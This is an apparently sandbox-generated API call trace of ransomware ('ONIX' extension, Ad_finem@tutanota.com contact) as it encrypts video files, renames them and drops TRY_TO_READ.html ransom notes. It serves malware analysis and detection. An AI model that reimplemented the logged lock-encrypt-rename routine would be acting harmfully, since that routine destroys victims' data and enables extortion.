0x410000 [0121.990] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.990] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d6e3b0, ftCreationTime.dwHighDateTime=0x1d5d8cb, ftLastAccessTime.dwLowDateTime=0x97e0c100, ftLastAccessTime.dwHighDateTime=0x1d5d875, ftLastWriteTime.dwLowDateTime=0x97e0c100, ftLastWriteTime.dwHighDateTime=0x1d5d875, nFileSizeHigh=0x0, nFileSizeLow=0x8b18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yj76e3_.mkv", cAlternateFileName="")) returned 1 [0121.990] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yj76e3_.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.990] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.991] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x8b18, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.991] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.991] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.991] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.991] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.992] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.992] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.992] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv", dwFileAttributes=0x80) returned 1 [0121.992] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv") returned 49 [0121.992] GetProcessHeap () returned 0x410000 [0121.992] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd2) returned 0x44faf8 [0121.992] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv" [0121.992] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.992] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=35608) returned 1 [0121.992] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x8b18 [0121.992] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.992] GetProcessHeap () returned 0x410000 [0121.992] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.992] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.994] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.995] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.996] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8b18) returned 0x4dcb68 [0121.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8b18) returned 0xf50048 [0121.998] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.998] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x8b18, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x8b18, lpOverlapped=0x0) returned 1 [0122.000] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x8b18, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.000] CloseHandle (hObject=0x4c8) returned 1 [0122.001] GetProcessHeap () returned 0x410000 [0122.001] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.001] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yj76e3_.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yj76e3_.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yj76e3_.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.003] GetProcessHeap () returned 0x410000 [0122.003] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.003] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabbc2330, ftCreationTime.dwHighDateTime=0x1d5e802, ftLastAccessTime.dwLowDateTime=0x3b104a50, ftLastAccessTime.dwHighDateTime=0x1d5e616, ftLastWriteTime.dwLowDateTime=0x3b104a50, ftLastWriteTime.dwHighDateTime=0x1d5e616, nFileSizeHigh=0x0, nFileSizeLow=0xc51c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yWxD7Ubp-FLSbU3l.flv", cAlternateFileName="YWXD7U~1.FLV")) returned 1 [0122.003] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ywxd7ubp-flsbu3l.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0122.003] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.004] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xc51c, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.004] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.004] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0122.004] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.004] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.005] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.005] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.005] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv", dwFileAttributes=0x80) returned 1 [0122.005] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv") returned 58 [0122.005] GetProcessHeap () returned 0x410000 [0122.005] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0122.005] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv" [0122.005] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.005] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=50460) returned 1 [0122.005] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xc51c [0122.005] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.005] GetProcessHeap () returned 0x410000 [0122.005] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.005] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.007] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.008] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.009] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.010] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc51c) returned 0x4dcb68 [0122.010] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc51c) returned 0xf50048 [0122.011] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.011] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0xc51c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0xc51c, lpOverlapped=0x0) returned 1 [0122.014] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xc51c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.014] CloseHandle (hObject=0x4c8) returned 1 [0122.015] GetProcessHeap () returned 0x410000 [0122.015] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.015] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ywxd7ubp-flsbu3l.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yWxD7Ubp-FLSbU3l.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ywxd7ubp-flsbu3l.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.017] GetProcessHeap () returned 0x410000 [0122.017] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.017] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7045daf0, ftCreationTime.dwHighDateTime=0x1d5e76f, ftLastAccessTime.dwLowDateTime=0xa00f7b80, ftLastAccessTime.dwHighDateTime=0x1d5d9a8, ftLastWriteTime.dwLowDateTime=0xa00f7b80, ftLastWriteTime.dwHighDateTime=0x1d5d9a8, nFileSizeHigh=0x0, nFileSizeLow=0xaa44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_uYucI 8ljko.mkv", cAlternateFileName="_UYUCI~1.MKV")) returned 1 [0122.017] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uyuci 8ljko.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0122.017] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.017] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xaa44, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.017] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.017] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0122.018] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.018] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.018] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.018] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.018] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv", dwFileAttributes=0x80) returned 1 [0122.018] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv") returned 54 [0122.018] GetProcessHeap () returned 0x410000 [0122.018] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdc) returned 0x44faf8 [0122.018] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv" [0122.018] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.018] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=43588) returned 1 [0122.018] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xaa44 [0122.019] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.019] GetProcessHeap () returned 0x410000 [0122.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.019] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.020] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.022] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.023] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.024] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaa44) returned 0x4dcb68 [0122.024] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaa44) returned 0xf50048 [0122.025] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.025] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0xaa44, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0xaa44, lpOverlapped=0x0) returned 1 [0122.027] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xaa44, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.027] CloseHandle (hObject=0x4c8) returned 1 [0122.028] GetProcessHeap () returned 0x410000 [0122.028] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.028] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uyuci 8ljko.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uYucI 8ljko.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uyuci 8ljko.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.030] GetProcessHeap () returned 0x410000 [0122.030] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.030] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7045daf0, ftCreationTime.dwHighDateTime=0x1d5e76f, ftLastAccessTime.dwLowDateTime=0xa00f7b80, ftLastAccessTime.dwHighDateTime=0x1d5d9a8, ftLastWriteTime.dwLowDateTime=0xa00f7b80, ftLastWriteTime.dwHighDateTime=0x1d5d9a8, nFileSizeHigh=0x0, nFileSizeLow=0xaa44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_uYucI 8ljko.mkv", cAlternateFileName="_UYUCI~1.MKV")) returned 0 [0122.030] CloseHandle (hObject=0x3cc) returned 1 [0122.030] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.030] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x19c)) [0122.030] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.031] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.031] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.031] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Adobe9c354ca09c354b444c.lock") returned 48 [0122.031] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\adobe9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.031] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.031] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.032] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0122.032] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f030 [0122.032] FindNextFileW (in: hFindFile=0x48f030, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.032] FindNextFileW (in: hFindFile=0x48f030, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0122.032] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\Acrobat\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\acrobat\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc [0122.033] FindNextFileW (in: hFindFile=0x48f030, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0122.034] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\arm\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc [0122.035] FindNextFileW (in: hFindFile=0x48f030, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x328f8cf0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328f8cf0, 